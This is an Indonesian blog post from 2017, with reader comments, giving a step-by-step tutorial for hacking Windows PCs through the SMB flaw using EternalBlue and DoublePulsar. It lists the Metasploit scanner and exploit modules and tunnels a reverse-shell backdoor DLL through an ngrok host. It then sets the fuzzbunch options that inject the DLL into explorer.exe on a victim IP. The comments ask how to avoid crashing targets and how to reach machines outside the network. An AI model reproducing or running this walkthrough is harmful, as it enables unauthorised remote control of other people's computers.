Thursday, 8 June 2017

Exploit windows dengan eternalblue_doublepulsar & ngrok

Exploit windows dengan eternalblue_doublepulsar & ngrok.

Berhubung repositorynya backboxindonesia lagi bermasalah jdi saya buat alternativenya.

Download semua bahan2 dulu : https://github.com/black-hell/exploit

eternalblue_doublepulsar : https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 

Untuk penginstalan ngrok bisa ke sini : https://ngrok.com/

Dan untuk bisa menggunakan doublepulsar, anda harus menginstall wine.

 1. Cari target yg vuln SMB, untuk mengetahui apakah target vuln SMB bisa cek  dengan ms17_010, Jika target vuln maka akan seperti dibawah ini.
use auxiliary/scanner/smb/smb_ms17_010

2. Kalo sudah lanjut untuk exploit target dengan eternalblue_doublepulsar.
use exploit/windows/smb/eternalblue_doublepulsar

Jika backdoor sukses, mari lanjut ke tahap berikut :D

3. Lanjut dengan ngrok.
ngrok tcp 123

4.  Tahap pembuatan backdoor dengan pusdik. Atur pembuatan backdoor dengan ip dan port di ngrok, sedangkan untuk listenya port 123 sesuai dengan yg saya bikin.
[?] LHOST  : 0.tcp.ngrok.io
[?] LPORT  : 13588
[?] Listen (y/n) : y
[?] LPORT  : 123
  
jika sudah copykan file backdoor yg anda buat ke folder /tmp/.
cp win64.dll /tmp/
5. Next exploitasi win tsb, buka fuzzbunch yg sudah di download tdi.
fuzzbunch

 


Set TargetIp :(ipkorban), enter, set Architecture [1] :(x64/x86), enter, set Function : pilih nomor 2(RunDLL), enter, set DllPayload  : /tmp/win64.dll, enter, set ProcessName : explorer.exe.

6. JIka sudah, enter tunggu sampai tulisan
     DLL built
     Sending shellcode to inject DLL
     Backdoor returned code: 10 - Success!
     Command completed successfully

dan selesailah exploitasi windows tsb :v

10 comments:

  1. Solusi biar pas eksekusi dengan DoublePulsar targetnya ngga BSOD gimana ya?

    ReplyDelete
  2. klo itu mah keknya dari pc target yg sering BSOD kali, soalnya setiap w exploit kgk perna ada yg BSOD

    ReplyDelete
    Replies
    1. x86 Processinject pake lsass.exe apa explorer.exe?
      x64 pake wlms.exe apa explorer.exe?

      Delete
    2. x64/x86 make explorer.exe

      Delete
  3. ini masih 1 jaringan apa luar jaringan bang?

    ReplyDelete
  4. share tutor buat yg win10 juga gan :D

    ReplyDelete
  5. Tutor install fuzzbunchnya gan? pnyaku gagal pas buka fuzzbunch krna Python 2.6 ga bisa diinstall. -_- kali linux 2.0 sana gan

    ReplyDelete